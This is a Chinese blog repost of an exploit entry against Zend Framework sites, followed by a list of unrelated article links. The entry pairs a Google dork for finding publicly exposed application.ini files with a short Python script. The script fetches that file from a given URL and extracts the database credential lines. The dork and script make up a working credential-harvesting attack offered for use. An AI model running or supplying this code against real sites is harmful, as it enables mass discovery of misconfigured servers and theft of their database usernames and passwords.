博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Zend-Framework - Full Info Disclosure
阅读量:2438 次
发布时间:2019-05-10

本文共 768 字,大约阅读时间需要 2 分钟。

# Exploit Title : Zend-Framework Full Info Disclosure
# Google Dork : inurl:/application/configs/application.ini
# Date : 26/11/2013
# Exploit Author : Ariel Orellana
# Vendor Homepage : http://framework.zend.com/
# Category : Web applications
# Tested on : GNU/Linux
  
#[Comment]Greetz : Daniel Godoy
  
#[PoC] :
#The username and password of the database may be obtained trough the "application.ini" file
  
#Vulnerable page : http://target.com/application/configs/application.ini
  
  
#!/usr/bin/python
import
string
import
re
from
urllib2
import
Request, urlopen
disc
=
"/application/configs/application.ini"
url
=
raw_input
(
"URL: "
)
req
=
Request(url
+
disc)
rta
=
urlopen(req)
print
"Result"
html
=
rta.read()
rdo
=
str
(re.findall(
"resources.*=*"
, html))
print
rdo
exit

转载地址:http://owmmb.baihongyu.com/

你可能感兴趣的文章
第一个JSP程序(JSP入门)
查看>>
JSP语法简介
查看>>
JavaBean入门与简介
查看>>
JSP中EL表达式入门与简介
查看>>
Spring入门实例
查看>>
Spring的几种注入方式
查看>>
Spring自动装配
查看>>
Hibernate入门与实例
查看>>
Jython入门学习
查看>>
Hiberate基础用法实例
查看>>
Maven编译时指定JDK版本
查看>>
Hibernate单向关联N-1
查看>>
Hibernate单向关联1-1
查看>>
jQuery自定义动画
查看>>
Spring-data-redis在shiro中的实例
查看>>
GUN C中__attribute__作用
查看>>
3、系统调用之SYSCALL_DEFINE分析
查看>>
linux的signal_pending及signal
查看>>
OBJDUMP用法
查看>>
c/cplusplus通用makefile
查看>>